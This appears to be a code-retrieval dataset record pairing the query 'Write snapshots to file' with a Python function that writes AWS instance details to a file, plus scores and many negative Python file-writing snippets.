[ "0.7562754", "0.743017", "0.65671015", "0.65112525", "0.64657086", "0.64657086", "0.6451764", "0.64466846", "0.6253342", "0.617585", "0.612374", "0.61043537", "0.60520536", "0.6024088", "0.6023335", "0.6000197", "0.59535676", "0.58751094", "0.58477306", "0.5843929", "0.58373475", "0.58362603", "0.5787403", "0.57794976", "0.57612395", "0.57568026", "0.5736809", "0.57268786", "0.5725884", "0.5718465", "0.5707559", "0.57068634", "0.57051593", "0.5701365", "0.5695726", "0.5692383", "0.5671681", "0.56697845", "0.5668952", "0.56333035", "0.56287324", "0.5622316", "0.55949354", "0.55928165", "0.5591611", "0.55842584", "0.5580846", "0.55775553", "0.55746657", "0.55710274", "0.55685514", "0.5568485", "0.5563695", "0.5558654", "0.5551221", "0.5549031", "0.5548754", "0.5541194", "0.5540035", "0.55400306", "0.55246824", "0.55188715", "0.5510329", "0.55068064", "0.5505558", "0.5502339", "0.5501603", "0.55009997", "0.5489955", "0.5486651", "0.5478949", "0.5477387", "0.5476911", "0.54641855", "0.54568875", "0.5454869", "0.5453928", "0.5453023", "0.54456866", "0.54424787", "0.54385954", "0.5437192", "0.54368", "0.54329026", "0.5427637", "0.5419708", "0.54187787", "0.5418108", "0.54150265", "0.5412744", "0.5411617", "0.54024976", "0.5402494", "0.54017276", "0.53987134", "0.53948605", "0.5394765", "0.5394127", "0.5392206", "0.53852654" ]
0.6254951
8
Write snapshots to file
def generateInfoInstances(regions): print "Writing instances info to output file %s" % instances_data_output_file with open(instances_data_output_file, 'w') as f3: f3.write("INSTANCES\n") f3.write("Name\tinstance ID\tKEEP-tag\tproduction\tinstance_type\tstate\tlaunched\tsecurity_groups\tregion\n\n") for region in regions: print "." # feedback for user instances = getInstances(region) for i in instances: f3.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (get_name_tag(i), i.id, getKeepTag(i), isProduction(i), i.instance_type, i.state, i.launch_time, getGroups(i), i.region.name))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write_snapshot(self):\n json.dump(self.snapshot, open(paths.RESULTS_FILE, 'w'), indent=4, sort_keys=True)", "def saveSnapshot(self, filename): \n\t\tpass", "def write_to_file(self, filename: str) -> None:", "def save_snapshot(args):\n html_doc = document.Document(get_code(args.file))\n info = html_doc.save(args.message, date=args.edition, region=args.region)\n if info is None:\n print('Duplicate snapshot. No snapshot saved.')\n else:\n print('Snapshot saved for {:s} {:%B %d, %Y}. '.format(info[2].capitalize(), info[3]) +\n '{0!r:} - {1:%B} {1.day:2}, {1:%Y %l:%M:%S.%f %p}'.format(info[0], info[1]))", "def write(self, filename):\n pass", "def write(self, filename):\n pass", "def write_snapshots_single_file(dynGraph: DynGraphSN, outputFile: str,both_directions=False):\n f = open(outputFile,\"w\")\n allGraphs = dynGraph.snapshots()\n for t,g in allGraphs.items():\n for e in g.edges():\n weights=\" \"+str(1)\n f.write(str(t)+\" \"+str(e[0])+\" \"+str(e[1])+weights+\"\\n\")\n if both_directions:\n f.write(str(t) + \" \" + str(e[1]) + \" \" + str(e[0]) + weights + \"\\n\")\n f.close()", "def _write(self, schema, writer, snapshots):\n encoder = self.serializer\n doc = {\n META_SCHEMA: [encoder.serialize_column(c) for c in schema],\n META_SNAPSHOTS: [encoder.serialize_snapshot(s) for s in snapshots],\n META_ROWCOUNT: writer.row_counter,\n META_PRIMARYKEY: self._primary_key\n }\n with open(self.tmpmetafile, 'w') as f:\n json.dump(doc, f, cls=self.encoder)\n # Close the archive writer.\n writer.close()\n # Replace existing files with temporary files for new archive version.\n # This is the point of no return.\n # TODO: Instead of moving files we could delete (or keep) previous\n # files as backup.\n shutil.move(src=self.tmpmetafile, dst=self.metafile)\n shutil.move(src=self.tmpdatafile, dst=self.datafile)", "def generateInfoSnapshots(regions):\n print \"Writing snapshots info to output file %s\" % snapshots_data_output_file\n snapshots = []\n for r in regions:\n snapshots += getSnapshotsD(r)\n print \".\" # feedback for the user\n with open(snapshots_data_output_file, 'w') as f2:\n f2.write(\"SNAPSHOTS\\n\")\n f2.write(\n \"Name\\tsnapshot_id\\tKEEP-tag_of_snapshot\\tKEEP-tag_of_AMI\\tproduction?\\tassociated_AMI\\tstart_time\\tstatus\"\n \"\\tregion\\tprogress\\tassociated_volume\\tvolume_size\\tdescription\\n\\n\")\n for s in snapshots:\n f2.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\"\n % (s['Name'], s['id'], s['KEEP-tag'], s['AMI_KEEP-tags'], s['PROD'], s['AMI(s)'], s['start_time'],\n s['status'], s['region'], s['progress'], s['volume_id'], s['volume_size'], s['Description']))", "def save_snapshot(snapshot_id):\n\n if comm is not None:\n comm.barrier() # if parallel, ensure that we are always in sync, so snapshots are always a consistent set\n\n if ns_args['snapshot_per_parallel_task']:\n rank_id = \"%d\" % rank\n else:\n rank_id = \"ALL\"\n\n if ns_args['snapshot_per_parallel_task'] or rank == 0:\n try:\n snapshot_io = open(ns_args['out_file_prefix']+'snapshot.%s.%s.%s' % (snapshot_id, rank_id, ns_args['config_file_format']), \"w\")\n except:\n snapshot_io = open(ns_args['out_file_prefix']+'snapshot.%d.%s.%s' % (snapshot_id, rank_id, ns_args['config_file_format']), \"w\")\n\n root_walkers_write_t0 = time.time()\n for at in walkers:\n at.info['volume'] = at.get_volume()\n at.info['iter']=snapshot_id\n ase.io.write(snapshot_io, at, format=ns_args['config_file_format'])\n print \"root walkers write time \", time.time() - root_walkers_write_t0\n\n if not ns_args['snapshot_per_parallel_task']:\n if comm is not None: # gather other walkers to do I/O on master task\n if rank == 0: # I/O on master task\n for r in range(1,size):\n remote_walkers_recv_t0 = time.time()\n remote_walkers = comm.recv(source=r, tag=2)\n print \"save_snapshot remote walkers recv time \", r, time.time() - remote_walkers_recv_t0\n remote_walkers_write_t0 = time.time()\n for at in remote_walkers:\n at.info['volume'] = at.get_volume()\n at.info['iter']=snapshot_id\n ase.io.write(snapshot_io, at, format=ns_args['config_file_format'])\n print \"save_snapshot remote walkers write time \", r, time.time() - remote_walkers_write_t0\n else: # not master task\n comm.send(walkers, dest=0, tag=2)\n\n if ns_args['snapshot_per_parallel_task'] or rank == 0:\n snapshot_io.close()", "def write(self, outfile, rebasings=None):\r\n raise NotImplementedError()", "async def snapshots(secspy, cameras):\n _LOGGER.info(\"SAVE SNAPSHOTS:\")\n\n for camera in cameras:\n filename = f\"snapshot_{camera}.jpg\"\n image = await secspy.get_snapshot_image(camera)\n with open(filename, \"wb\") as img_file:\n _LOGGER.info(f\"Writing snapshot {filename}\")\n img_file.write(image)\n time.sleep(1)", "def saveStatsFile(self):\n if not os.path.exists(\"stats\"):\n os.mkdir(\"stats\")\n now = datetime.datetime.now()\n parts = [now.year, now.month, now.day]\n parts = [\"%02d\"%x for x in parts]\n todaysFileName = \"-\".join(parts)+\".txt\" \n timeStamp = time.strftime(\"%y%m%d%H%M\", time.localtime())\n log = \",\".join(self.logLinesStats)\n fname = \"stats/\"+todaysFileName\n with open(fname, 'a') as f:\n f.write(timeStamp+\",\"+log+\"\\n\")\n self.log(\"wrote \"+fname)", "def _write(self):\n\n output_path = os.path.join(config.S3_OUTPUT, config.DATAFRAME_ARTISTS)\n dataframe = self._cache.get_source(config.DATAFRAME_ARTISTS)\n\n print('Writing dataframe to {}'.format(output_path))\n\n dataframe.write.parquet(\n output_path,\n mode='overwrite'\n )", "def write_snapshots(dynGraph:DynGraphSN, outputDir:str, format:str=None):\n if format==None:\n format=\"edges\"\n allGraphs = dynGraph.snapshots()\n for g in allGraphs:\n _write_network_file(allGraphs[g],os.path.join(outputDir,str(g)),out_format=format)", "def write(self, filename): # real signature unknown; restored from __doc__\n pass", "def write(self, fname):\n pass", "def writestat(self, snapshot, halos, statoutfile, hubble=None):\n s = snapshot\n mindarkmass = min(s.dark['mass'])\n\n if hubble is None:\n hubble = s.properties['h']\n\n outfile = statoutfile\n logger.info(\"Writing stat file to %s\" % statoutfile)\n fpout = open(outfile, \"w\")\n header = \"#Grp N_tot N_gas N_star N_dark Mvir(M_sol) Rvir(kpc) GasMass(M_sol) StarMass(M_sol) DarkMass(M_sol) V_max R@V_max VelDisp Xc Yc Zc VXc VYc VZc Contam Satellite? False? ID_A\"\n print >> fpout, header\n nhalos = halos._nhalos\n for ii in xrange(nhalos):\n h = halos[ii + 1].properties # halo index starts with 1 not 0\n # 'Contaminated'? means multiple dark matter particle masses in halo)\"\n icontam = np.where(halos[ii + 1].dark['mass'] > mindarkmass)\n if (len(icontam[0]) > 0):\n contam = \"contam\"\n else:\n contam = \"clean\"\n # may want to add implement satellite test and false central\n # breakup test.\n\n n_dark = h['npart'] - h['n_gas'] - h['n_star']\n M_dark = h['mass'] - h['M_gas'] - h['M_star']\n ss = \" \" # can adjust column spacing\n outstring = str(int(h['halo_id'])) + ss\n outstring += str(int(h['npart'])) + ss + str(int(h['n_gas'])) + ss\n outstring += str(int(h['n_star'])) + ss + str(int(n_dark)) + ss\n outstring += str(h['mass'] / hubble) + ss + \\\n str(h['Rvir'] / hubble) + ss\n outstring += str(h['M_gas'] / hubble) + ss + \\\n str(h['M_star'] / hubble) + ss\n outstring += str(M_dark / hubble) + ss\n outstring += str(h['Vmax']) + ss + str(h['Rmax'] / hubble) + ss\n outstring += str(h['sigV']) + ss\n # pos: convert kpc/h to mpc (no h).\n outstring += str(h['Xc'] / hubble / 1000.) + ss\n outstring += str(h['Yc'] / hubble / 1000.) + ss\n outstring += str(h['Zc'] / hubble / 1000.) + ss\n outstring += str(h['VXc']) + ss + \\\n str(h['VYc']) + ss + str(h['VZc']) + ss\n outstring += contam + ss\n outstring += \"unknown\" + \\\n ss # unknown means sat. test not implemented.\n outstring += \"unknown\" + ss # false central breakup.\n print >> fpout, outstring\n fpout.close()\n return 1", "def writehalos(self, snapshot, halos, hubble=None, outfile=None):\n s = snapshot\n grpoutfile = s.filename + \".amiga.grp\"\n statoutfile = s.filename + \".amiga.stat\"\n tipsyoutfile = s.filename + \".amiga.gtp\"\n halos.writegrp(s, halos, grpoutfile)\n halos.writestat(s, halos, statoutfile, hubble=hubble)\n shalos = halos.writetipsy(s, halos, tipsyoutfile, hubble=hubble)\n return shalos", "def dump(self, filename, mode='w', rebox=False):\n from os import path\n filepath = path.abspath(path.expanduser(filename))\n if mode == 'w':\n open(filepath, 'w').close() \n for t, ts in self:\n ts.dump(filename, rebox=rebox)", "def save_file(map_, args): \n if args.segments:\n p = os.path.join(args.res_dir, 'compression_'+args.db+\"_seg\")\n else:\n p = os.path.join(args.res_dir, 'compression_'+args.db)\n with open(p, 'w') as f:\n for file in map_:\n f.write(\"{} {}\\n\".format(file, map_[file]))", "def snapshot(self, filename=None):\n if filename:\n self.command(\"snapshot %(filename)s\" % locals())\n else:\n self.command(\"snapshot\")", "def test_16_0_saveToFile(self):\n\n Rectangle.save_to_file([self.r1, self.r2])\n self.assertTrue(os.path.isfile(\"Rectangle.json\"))", "def save_meta_file(gen_dict, f_name):\r\n logger = custom_logger.CustomLogger(run_id+':'+file_id)\r\n filename = run_id+'_'+ f_name +'.meta'\r\n f = open(os.path.join(unique_op_dir, filename),'a')\r\n print('Output stored in %s'%(str(os.path.join(unique_op_dir, filename))))\r\n logger.info('Output stored in %s'%(str(os.path.join(unique_op_dir, filename))))\r\n for key, val in gen_dict.items():\r\n line = str(key)+\" : \"+str(val)+\"\\n\"\r\n f.write(line)", "def file_output(matches: list, output_file_name: str = 'matches.txt'):\n with open(\"test/Matches/\" + output_file_name, 'w') as f:\n for match in matches:\n for event in match.events:\n f.write(\"%s\\n\" % event.payload)\n f.write(\"\\n\")", "def write_to_file(info: List[str]) -> None:\n return", "def write_to_file(self, filepath, mode = \"a\"): \n if \"r\" in mode: \n print(\"Only accepts write and append modes\")\n return \n with open(filepath, mode) as f: \n f.write(\"{}\\n\".format(self.title))\n verified, seen, ratio = self.get_verified_ratio()\n f.write(\"Verified Names: {}\\n\".format(str(verified)))\n f.write(\"Names: {}\\n\".format(str(seen)))\n f.write(\"Ratio: {}\\n\".format(str(ratio)))", "def save_graph(self, widget, data=None):\n\t\t#un po' di pulizia prima di fare il salvataggio\n\t\tos.system(\"find ./extra/MonitorGraph/ -type f -not -name '*.png' | xargs rm -f\")\n\t\tsnapshotFile =\"./extra/UserOutput/Snapshot\"+time.strftime(\"%Y%m%d-%H%M\", time.gmtime())+\".tar\"\n\t\tos.system(\"tar -cf \"+snapshotFile+\" --exclude def* --directory ./extra/ MonitorGraph/\")\n\t\tprint \"Snapshot saved to\",snapshotFile", "def write_file(self, filename, contents):\n blob = self.repo.create_blob(contents)\n self.index.add(pygit2.IndexEntry(filename, blob, pygit2.GIT_FILEMODE_BLOB))", "def writeFile(fileName, profile, singleScores, bestMotifs, dnaScores, bestMotif):\n with open(fileName, 'w+') as f:\n f.write(strftime(\"Created on: %Y-%m-%d %H:%M:%S\\n\", localtime()))\n f.write('Best Motifs: ')\n f.write('\\n')\n json.dump(bestMotif, f)\n f.write('\\n')\n f.write('Motifs Profile: ')\n f.write('\\n')\n json.dump(profile, f)\n f.write('\\n')\n f.write('Single Scores: ')\n f.write('\\n')\n for i in range(0, len(singleScores)):\n json.dump(bestMotifs[i], f)\n f.write(': ')\n json.dump(singleScores[i], f)\n f.write('\\n')\n f.write('Motifs that have a better score than the worst scoring one: ')\n f.write('\\n')\n for scores in dnaScores:\n json.dump(scores, f)\n f.write('\\n')", "def write_file(self, filename, fileformat=\"json\"):\n if self.df_avg is None:\n self.collect_stats()\n if fileformat == \"json\":\n self.write_json(filename)\n elif fileformat == \"excel\":\n self.write_excel(filename)", "def filewrite(self, filename):\n io.write(self, filename)", "def write_info_to_file(self):\n\n self.info.write_mission_info()\n\n self.logger.info(\"Mission instance write succeeded.\")", "def write_file(*args, **kwargs): # real signature unknown\n pass", "def write_file(self):\n if self._write_file == None:\n return\n\n try:\n out = file(self._write_file, \"w\")\n except IOError, e:\n print e\n sys.exit(1)\n out.writelines(\"A cases\") \n out.close()", "def write_results(detections, filename):\n start = time.time()\n\n boxes, labels, scores = detections\n with PathManager.open(filename, \"w\") as f:\n for key in boxes.keys():\n for box, label, score in zip(boxes[key], labels[key], scores[key]):\n f.write(\n \"%s,%.03f,%.03f,%.03f,%.03f,%d,%.04f\\n\"\n % (key, box[1], box[0], box[3], box[2], label, score)\n )\n\n logger.info(\"AVA results wrote to %s\" % filename)\n logger.info(\"\\ttook %d seconds.\" % (time.time() - start))", "def save(self, fn: str) -> None:\n fout = open(fn, 'w')\n for t,x in zip(self.times,self.milestones):\n fout.write('%f\\t%d '%(t,len(x)))\n fout.write(' '.join([str(xi) for xi in x]))\n fout.write('\\n')\n fout.close()", "def to_file(self, filename=None):\n name = None\n if filename is not None:\n name = filename\n elif self.name:\n name = self.name\n\n if name:\n #f = open(self.name, 'w')\n f = codecs.open(name, 'w', encoding='utf-8')\n self.seek(0)\n f.write(self.read())\n f.close()\n else:\n print \"No log_name for this log\"", "def store(self, filename):", "def write(self):\n f, ds = self.opendset()\n #\n # Now add the images\n #\n start_time = time.clock() # time this\n nframes = 0 # number completed\n print_every = 1; marker = \" .\";\n print('Frames written (of %s):' % self.ntowrite, end=\"\")\n for i in range(self.nfiles):\n if nframes >= self.ntowrite: break\n\n logging.debug('processing file %d of %d' % (i+1, self.nfiles))\n img_i = fabio.open(self.files[i])\n nfi = img_i.nframes\n for j in range(nfi):\n msg = '... file %d/image %d' % (i, j)\n logging.debug(msg)\n if j < self.nempty:\n logging.debug('... empty frame ... skipping')\n else:\n ds[nframes, :, :] = img_i.data\n nframes += 1\n if numpy.mod(nframes, print_every) == 0:\n print(marker, nframes, end=\"\")\n print_every *= 2\n sys.stdout.flush()\n logging.debug('... wrote image %s of %s' %\\\n (nframes, self.ntowrite))\n if nframes >= self.ntowrite:\n logging.debug('wrote last frame: stopping')\n break\n if j < nfi - 1:\n # on last frame in file, fabio will look for next file\n img_i = img_i.next()\n\n f.close()\n print(\"\\nTime to write: %f seconds \" %(time.clock()-start_time))", "def save_quickstreams(quickstreams):\n with open('quickstreams.txt', 'w') as f:\n json.dump(quickstreams, f, indent=4)", "def write_image(out, frame):\n if not os.path.exists(out):\n os.makedirs(out)\n now = datetime.now() \n dt_string = now.strftime(\"%H-%M-%S-%f\") \n filename = f'{out}/{dt_string}.png'\n logging.info(f'write image {filename}')\n cv2.imwrite(filename, frame)", "def __write_measurement(self, measurement):\n with self.__filename.open(mode='a') as history_file:\n history_file.write(measurement + '\\n')", "def write_output_file(self, index):\n ctx = self.block_store.make_local_output(self.expected_outputs[index])\n self.open_output_contexts[index] = ctx\n return ctx.get_filename()", "def _toFile(self):\n pass", "def write(self, outfile):\n outfile.write(\n '\\t'.join(\n [\n str(i) for i in [\n self.chrom, self.start, self.end, self.name,\n self.count, self.fold_change, self.log10p\n ]\n ]\n )\n )\n outfile.write('\\n')", "def writefile():\n\n print(\"Writing to file...\")\n\n # Open the heartbeat file in append mode and save the current time.\n with open(settings.ROOT_DIR + \"/heartbeat\", \"a\") as f:\n f.write(str(time()))", "def saveToFile(html):\n #print(\"Saving to file.\")\n html += \"\\n\"\n #open necessary files to save\n logFile = open(\"postLog_{0}_{1}.txt\".format(os.path.splitext(path)[0], dateTimeNow), \"a\")\n logFile.write(html)\n logFile.close()\n #print(\"Check Point.\")", "def save_outputs(d, dst_dir, site, file_format='json', write_mode='w'):\n \n \n min_date_str = str(min([pd.Timestamp(x) for x in d.keys()]).date())\n max_date_str = str(max([pd.Timestamp(x) for x in d.keys()]).date())\n fn = '_'.join([site, min_date_str, max_date_str]) + '.' + file_format\n dst = os.path.join(dst_dir, fn)\n with open(dst, write_mode) as f:\n if (file_format == 'json') & (write_mode =='w'):\n json.dump(d, f)\n elif (file_format == 'pkl') & (write_mode == 'wb'):\n pickle.dump(d, f)\n else:\n raise ValueError(\"File format or write mode incorrect.\\nOptions are 1) 'json', 'w' and 2) 'pkl', 'wb'\")", "def write_backup_file(backup_file, backup_data):\n\n fp = open(backup_file, mode=\"w\")\n\n for record in backup_data.values():\n json_str = json.dumps(record)\n fp.write(json_str)\n fp.write(\"\\n\")\n\n fp.close()", "def write_file(self):\n rl_df, lift_df = self.create_df()\n\n number = re.findall('\\d+', self.url)[0]\n\n if self.write is True:\n with open('house_{}.csv'.format(number), 'w',\n encoding='utf-8-sig') as file:\n rl_df.to_csv(file, sep=';')\n with open('house_lifts_{}.csv'.format(number), 'w',\n encoding='utf-8-sig') as file2:\n lift_df.to_csv(file2, sep=';')", "def save_meta(self):\n # jOut = os.path.join(self.meta[\"wdir\"], meta_file)\n with open(self.meta_filepath, \"w\") as f:\n json.dump(self.meta, f)", "def save(self,outPath=None):\n if (not self.canSave): raise StateError(_(\"Insufficient data to write file.\"))\n if not outPath:\n fileInfo = self.fileInfo\n outPath = os.path.join(fileInfo.dir,fileInfo.name)\n out = file(outPath,'wb')\n #--Tes3 Record\n self.tes3.setChanged()\n self.tes3.hedr.setChanged()\n self.tes3.hedr.numRecords = len(self.records) #--numRecords AFTER TES3 record\n self.tes3.getSize()\n self.tes3.dump(out)\n #--Other Records\n for record in self.records:\n record.getSize()\n record.dump(out)\n out.close()", "def write_to_file(self, papers, filename):\n\t\tpass", "def write_the_contents_to_the_same_file(self):\n if not len(self.student_list):\n print('There is no contents to write')\n return\n\n if self._filename is None:\n self._filename = self.input_filename()\n\n with open(self._filename, 'w') as OUT:\n OUT.write(self.student_list.to_csv(date_format='%Y-%m-%d',\n sep='\\t', header=False, columns=self.columns_to_save))\n print(f'Data are saved into {self._filename!r}')", "def write(self, filename):\n\n self.__image.save(filename)", "def save(self, fname, snver=None):\n self._io.save(fname)", "def write_to_file(fib_details: dict):\n pass # TODO: Replace with implementation!", "def write_to_file(start_runtime, contents, write_mode='a'):\n with open(f\"{start_runtime}.txt\", write_mode) as f:\n f.write(\"Filename\\t\\tMaxTrack\\tNumInst\\t\\tTimeSig\\t\\tTPB\\n\")\n f.write(contents)", "def write_to_file(self, filename):\n self.octree.write(str.encode(filename))\n print(\"Save octomap to \"+filename)", "def write_to_file(self, file, content):\n with open(file, 'a') as report_file:\n report_file.write('{}\\n'.format(content))", "def log_event_to_file(event):\n with open('eventlogs/{}.json'.format(time.time()), 'w') as event_write:\n event_write.write(json_dumpstring(event))\n pass", "def write_thumbnails(self, appstruct):\n slugser = slugify(appstruct[\"serial\"])\n pdf_filename = \"thumbnails/%s/uploaded.pdf\" % slugser\n top_file = \"thumbnails/%s/top.png\" % slugser\n mos_file = \"thumbnails/%s/mosaic.png\" % slugser\n \n thumg = ThumbnailGenerator(pdf_filename)\n self.save_blob(thumg.top_thumbnail(), top_file)\n self.save_blob(thumg.mosaic_thumbnail(), mos_file)", "def write(self):\n # # Sometimes file is not written properly. So delete and rewrite it\n # os.system('rm {}'.format(snip_dir + '/' + self.name))\n # if 'NUM_TIME_STEPS' not in self.define.keys():\n # warnings.warn('NUM_TIME_STEPS missing in header. Execution may hang!')\n with open(snip_dir + '/' + self.name, 'w') as f:\n f.write('/* Temporary generated file for snip process definitions before compilation */\\n')\n f.write(self.__str__())\n\n # os.system('ls {}'.format(snip_dir + '/' + self.name))", "def save(self, filename):\n o = open(filename, 'w')\n o.write(self.write())\n o.close()", "def save(self, f):\n self.f = f\n for region in self.regions:\n ext = region.address & 0xFFFF0000\n self.write_hex_line(\n HexLine(0, EXTLINADR, struct.pack(\">H\", ext >> 16))\n )\n address = region.address - ext\n for chunk in chunks(region.data):\n if address >= 0x10000:\n ext += 0x10000\n self.write_hex_line(\n HexLine(0, EXTLINADR, struct.pack(\">H\", ext >> 16))\n )\n address -= 0x10000\n self.write_hex_line(HexLine(address, DATA, chunk))\n address += len(chunk)\n self.write_hex_line(HexLine(0, EOF))", "def write_hashes(filename):\n\n [head, tail] = os.path.split(filename)\n new_filename = f\"{head}/hashed-{tail}\"\n\n shutil.copy(filename, new_filename)\n\n with open(filename) as in_file:\n data = json.loads(in_file.read())\n\n click.echo(f\"Event ID: {data['event_id']}\")\n click.echo(\"Writing span hashes\")\n\n config = load_span_grouping_config({\"id\": DEFAULT_CONFIG_ID})\n results = config.execute_strategy(data)\n\n with open(new_filename, \"w\") as out_file:\n results.write_to_event(data)\n out_file.write(json.dumps(data, indent=4))\n\n click.echo(\"Done\")\n click.echo(\"\\n\")", "def write_map_to_file(dir, version, role, map_id, d):\n if not os.path.exists(dir):\n os.makedirs(dir)\n path = build_output_file_path(dir, version, role, map_id)\n with open(path, \"w\") as f:\n json.dump(d, f, sort_keys=True, indent=4)\n f.close()", "def write_output_shifts_to_file(self, shift_output):\n pass", "def store_action_log(self, filename):\n t = self.get_current_timeindex()\n camera_obs = self.get_camera_observation(t)\n self._action_log[\"final_object_pose\"] = {\n \"t\": t,\n \"pose\": camera_obs.object_pose,\n }\n\n with open(filename, \"wb\") as fh:\n pickle.dump(self._action_log, fh)", "def write_state_file(self, state):\r\n with open(StudentModuleHistoryCleaner.STATE_FILE, \"w\") as state_file:\r\n state_file.write(state)", "def GenerateRevisionFile(self):\n\n print 'Saving revision to %s' % self.revisions_path\n Write(\n self.revisions_path,\n ('{\"chromium_revision\":%d, \"webkit_revision\":%d, '\n '\"v8_revision\":%d}') % (self._chromium_revision,\n self._webkit_revision,\n self._v8_revision))", "def write_md_file(sip_uuid, filepath):\n sip = SIP.objects.get(pk=sip_uuid)\n md_object = load_file_data_from_db(sip, filepath)\n convert_md_object = json.dumps(\n md_object, sort_keys=True, ensure_ascii=False, indent=4\n )\n filename = os.path.join(filepath, \"metadata_output.json\")\n with open(filename, \"wb\") as f:\n f.write(six.ensure_binary(convert_md_object))", "def write_run(run):\n r=Run(run)\n r.write_all()", "def saveUsage(self, filePath):\n message = time.strftime('%c') + ' : '\n for spot in self.getParkingSpots():\n message += str(spot.id) + ', ' + spot.status + '; '\n with open(filePath, 'a+') as outfile:\n outfile.write(message + '\\n')\n pass", "def save(self, path, alignment, positions):\n path = path[7:]\n if path[-5:] != \".json\":\n path += \".json\"\n if path[0] == \"/\" and path[2] == \":\":\n path = path[1:] # Windows fix\n with open(path, \"w\") as outfile:\n value = {\n \"angleCommand\": self._angle_command,\n \"horizontalCommand\": self._horizontal_command,\n \"verticalCommand\": self._vertical_command,\n \"origin\": self._origin,\n \"frameWidth\": self._frame_width,\n \"frameHeight\": self._frame_height,\n \"runs\": [r.to_json() for r in self._runs],\n \"alignment\": alignment.to_dict(),\n \"positions\": positions.to_dict()\n }\n json.dump(value, outfile)", "def write_to_file(entry, file):\n with open(file, \"a\") as f:\n f.write(entry)", "def _file_writer(self, lines, filename):\n if self.MockRun:\n return\n\n if self.Verbose:\n print \"Writing file %s\" % filename\n\n updated_file = open(filename, 'w')\n updated_file.write(''.join(lines))\n updated_file.close()", "def write_file(self, contents):\n fd = open(os.path.join(os.path.dirname(__file__),\n 'data', 'test.html'), 'w')\n fd.write(contents)\n fd.close()", "def write_to_file(inventory):\n env = Environment(loader=FileSystemLoader('templates'), trim_blocks=True)\n output_template = env.get_template('output.j2')\n # create and clean an 'outputs' folder\n path = \"./outputs\"\n try:\n shutil.rmtree(path, ignore_errors = True, onerror = None)\n except:\n print('Error while deleting directory')\n os.mkdir(path)\n os.chdir(path)\n for node, node_data in inventory.items():\n if 'outputs' in node_data:\n os.mkdir(node)\n for command, output in node_data['outputs'].items():\n # when creating filenames based on command, swap 'spaces' with 'underscores':\n command = re.sub(r\"\\s\", r\"_\", command)\n open(f\"{node}/{command}.txt\", 'a').write(\n output_template.render(node=node, data=output))\n print(\"\\n\" + f\"Job complete. If data gathering was successful, see 'outputs' directory.\")\n return inventory", "def write_jobfile(self, copyfiles):\n with open(self.options.jobfile, 'w') as fd:\n fd.write(json.dumps(copyfiles, indent=2))", "def save_features_to_file(self):\n if not os.path.exists(self.features_save_path):\n os.makedirs(self.features_save_path)\n for s in self.sets:\n self.save_features_to_file_by_set(s)", "def write_s3_file(data, date):\n logger.info(\"Writing history file to S3.\")\n bucket = os.getenv(\"SPOTIFY_BUCKET_NAME\")\n path = os.getenv(\"SPOTIFY_BUCKET_PATH\")\n s3 = boto3.client('s3')\n data = json.dumps(data)\n s3.put_object(Bucket=bucket, Key=\"%s/%s.json\" % (path, date), Body=data)", "def write_image(self, filename):\n cv2.imwrite(filename, self.image)", "def write(self, filename, data):\n raise NotImplementedError", "def write(self, file):\n pos = file.tell()\n pickle.dump((self.index, self.meta, self.info), file)\n file.seek(0)\n\n # update the header with the position of the content index.\n file.write(struct.pack('<Q', pos))", "def _write(self, filename, data):\n fullpath = os.path.join(self._tempdir, filename)\n with open(fullpath, 'w') as ofile:\n json.dump(data, ofile)\n return fullpath", "def write(self, filename, mode=\"w\"):\n d = self._result_dict\n val = yaml.safe_dump(d, default_flow_style=False)\n\n with open(str(filename), mode) as outfile:\n outfile.write(val)", "def _write_file(output_path: str, file_content: Iterable[str]) -> None:\n with open(output_path, \"w+\", encoding=\"utf-8\") as f:\n f.writelines(file_content)\n\n logging.info(f\"wrote to '{output_path}'\")", "def write_file_set(self, write_file):\n self._write_file = write_file", "def writeAlltoFile(self):\n with open(self._fname, 'w') as f:\n for elem in self.getAll():\n line = self._writeGratoLine(elem)\n f.write(line + \"\\n\")\n f.close()", "def fileWrite(content):\n file = open('./result.txt', 'w')\n file.write(content)\n file.close()", "def writeOut(self):\n # import time\n self.outHeader = self.srcHeader\n for line in self.outHeader:\n self.outFile.write(line + '\\n')\n # now = time.asctime(time.localtime(time.time()))\n # self.outFile.write('%% -- %s -- Written to new alog' % now)\n for time_s in sorted(self.outData):\n for sens in self.outData[time_s]:\n for meas in self.outData[time_s][sens]:\n valu = self.outData[time_s][sens][meas]\n msg_list = [str(time_s), meas, sens, str(valu)]\n line_string = reconstructLine(msg_list)\n self.outFile.write(line_string + '\\n')", "def take_snapshot():\n df = scrape()\n for i in df.index:\n single = df.loc[i]\n # create or get locations\n loc, created = Location.objects.get_or_create(\n name=single['Location'],\n all_stands=single['Stands'],\n coordinates=single['Coords']\n )\n # add a new snapshot\n obj = Snapshot(\n location=loc,\n avail_bikes=single['Bikes'],\n free_stands=single['Free stands'],\n timestamp=datetime.now(tz=timezone('Europe/Warsaw'))\n )\n obj.save()", "def write_checkpoint(self):\n self.file_checkpoint_data = open(self.path_checkpoint, \"a+\")\n array_to_write = [str(self.radious), self.type_feature, self.type_filtering, self.h_filterig]\n self.file_checkpoint_data.write(','.join(array_to_write) + \"\\n\")\n self.file_checkpoint_data.flush()", "def write_to(self, filename):\n with open(filename, 'w') as f:\n for xx, yy in zip(self.x, self.y):\n f.write(\"%s %s\\n\" % (xx, yy))\n logger.info(\"Written locations into file {0}\".format(filename))", "def write_xyz_file(allxyz):\n if SAVEXYZ:\n print('+> Saving riverbed topography file...', end='')\n if MODE == 1:\n np.savetxt('kinoshita_topo.xyz', allxyz, fmt='%.6e')\n elif MODE == 2:\n np.savetxt(FNAME.rsplit('.', 1)[0] + '_topo.xyz', allxyz, fmt='%.6e')\n print(' [done]')", "def write(self, filename, *args, **kwargs):\n self.to_fits().writeto(filename, *args, **kwargs)", "def save(self, inst):\n n = inst.dimensions[\"n\"]\n with open(self.location, \"wt\") as f:\n f.write(f\"measurements: {n}\\n\")\n f.write(f\"time temperature\\n\")\n for time, temp in zip(inst.time, inst.temperature):\n f.write(f\"{time:4} {temp:12}\\n\")", "def save_as(self, filename):\n opencv.imwrite(filename, self.img)", "def log_to_file(text, status='INFO'):\n outfile = open(LogName, 'a')\n outfile.write(timestamp()+' - '+status+' - '+str(text)+'\\n')\n outfile.close()" ]
